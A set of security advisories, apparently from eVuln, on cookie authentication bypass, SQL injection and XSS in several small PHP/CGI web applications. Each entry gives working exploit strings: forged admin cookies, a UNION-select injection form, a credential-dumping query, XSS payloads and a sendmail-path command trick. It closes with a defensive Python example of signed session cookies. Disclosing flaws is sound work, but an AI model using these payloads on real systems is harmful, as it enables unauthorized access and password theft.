Recent Cookie Authentication Bypass vulnerabilities
Here is a short summary of recent Cookie Authentication Bypass vulnerabilities discovered by the eVuln team. The full list with details is available on the eVuln Security Advisories page.
Cookie authentication bypass in Alguest.
Description.
Cookie-based authentication is not properly implemented in the admin.php, opzioni.php, elimina.php and modifica.php scripts. Administration functions are exposed.
Exploit.
There is no real password comparison for the admin user. The administration scripts check only for the existence of the admin cookie.
Cookie: admin=anyvalue
Solution
Solution is not available.
Cookie Auth Bypass in Hot Links SQL.
Description.
A cookie authentication bypass vulnerability was found in Hot Links SQL 3. It is possible to access the admin panel without any password comparison.
Exploit.
There is no password comparison during the authentication process; the script checks only the admin cookie. If its value is "logged in", the user is authenticated as Admin.
Cookie: admin=logged in
Solution
Solution is not available.
Multiple Vulnerabilities in VSNS Lemon.
Description.
Vulnerable script: functions/final_functions.php
The $id variable is not properly sanitized before being used in an SQL query. This can be used to bypass authentication or run arbitrary SQL queries by injecting SQL code.
Condition: magic_quotes_gpc = off
Comment form: the 'name' parameter is not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
It is also possible to bypass authentication for password-protected articles. The password-checking function does not compare the password; it only checks that a cookie value exists.
Exploit.
- <form method="post" action="http://[host]/vsns/index.php">
- <input type="hidden" name="towel" value="checkpass">
- <input name="id" value="9999' union select 123,4,5,6/*">
- <input type="password" name="password" value="123">
- <input type="submit" value="Go">
- </form>
Add Comment.
Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display
Name: [XSS]
Read any password-protected topic:
Cookie: vsns[topic_id] = 1
Solution
Solution is not available.
Multiple flaws in Leif M. Wright Blog.
Description.
None of the "txt" files are protected by .htaccess (or any other means) in the default installation. This can be used to retrieve the administrator's password from the config file.
The "blog.cgi" script does not compare the password when identifying the administrator by cookie.
Administrator has an ability to edit blog configuration including full path to sendmail program. This can be used to execute arbitrary shell commands.
System access is possible.
The HTTP_REFERER and HTTP_USER_AGENT environment variables are not properly sanitized. An HTTP request with a forged Referer or User-Agent value may therefore carry arbitrary HTML or script code, which is executed when the administrator opens the "Log" page.
Exploit.
URL example:
http://[host]/cgi-bin/blog/blogconfig.txt
Cookie: blogAdmin=true
Sendmail: /bin/ls
GET /cgi-bin/blog/blog.cgi HTTP/1.0
Host: [host]
Referer: [XSS]
User-Agent: [XSS]
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
file=15-13.59.39.txt&year=2006&month=February&name=zz&comment=zzz&submit=Enter%20my%20comment
Solution
Solution is not available.
Cookie Auth Bypass, SQL Injections, XSS in 427BB.
Description.
427BB has multiple vulnerabilities.
Vulnerable scripts: login.php, getvars.php
To authorize any logged-in user, the forum scripts check only three cookie values:
- username
- authenticated
- usertype
The forum does not compare the password.
For example:
Vulnerable script: showthread.php
The $ForumID variable is not properly sanitized before being used in an SQL query. This can be used to run arbitrary SQL queries by injecting SQL code.
Vulnerable Script: posts.php
Condition: the visitor needs to click the link.
Exploit.
No password needed:
Cookie: username=admin;Cookie: authenticated=1;Cookie: usertype=admin;
Requires being logged in as a registered user.
http://host/bb427/showthread.php? ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal
Posting a new message. Message text:
[url=javascript:alert(xss)]clickme[/url]
Solution
Solution is not available.
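Every advisory above shares one root cause: the server treats the mere presence (or a fixed value) of a cookie as proof of identity. The following is an added example, not code from eVuln or from any of the listed products, that puts that flawed check beside a hardened one using an HMAC-signed, expiring session cookie; the secret key, cookie names and field layout are assumptions made for the illustration.

```python
import hmac
import hashlib

# Constructed server-side secret for this example only; a real deployment
# generates it once and keeps it outside the web root (cf. blogconfig.txt above).
SECRET_KEY = b"example-secret-do-not-reuse"

def parse_cookie_header(header):
    """Parse a Cookie: header such as 'admin=anyvalue; session=...' into a dict."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name.strip()] = value.strip()
    return cookies

def is_admin_vulnerable(cookies):
    """The flawed pattern from the advisories: cookie existence is taken as proof."""
    return "admin" in cookies  # any value, even an empty one, passes

def make_session_cookie(username, role, issued_at, secret=SECRET_KEY):
    """Issue a signed session value: 'user|role|issued_at|HMAC-SHA256(payload)'."""
    payload = f"{username}|{role}|{issued_at}"
    sig = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{sig}"

def is_admin_hardened(cookies, now, secret=SECRET_KEY, max_age=3600):
    """Grant admin only for a session cookie with a valid, unexpired signature."""
    parts = cookies.get("session", "").split("|")
    if len(parts) != 4:
        return False
    username, role, issued_at, sig = parts
    payload = f"{username}|{role}|{issued_at}"
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):  # constant-time comparison
        return False
    if not issued_at.isdigit() or now - int(issued_at) > max_age:
        return False
    return role == "admin"
```

Because the role is covered by the signature, editing the cookie to claim "admin" (as in the 427BB usertype cookie) fails verification unless the attacker also holds the server secret.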

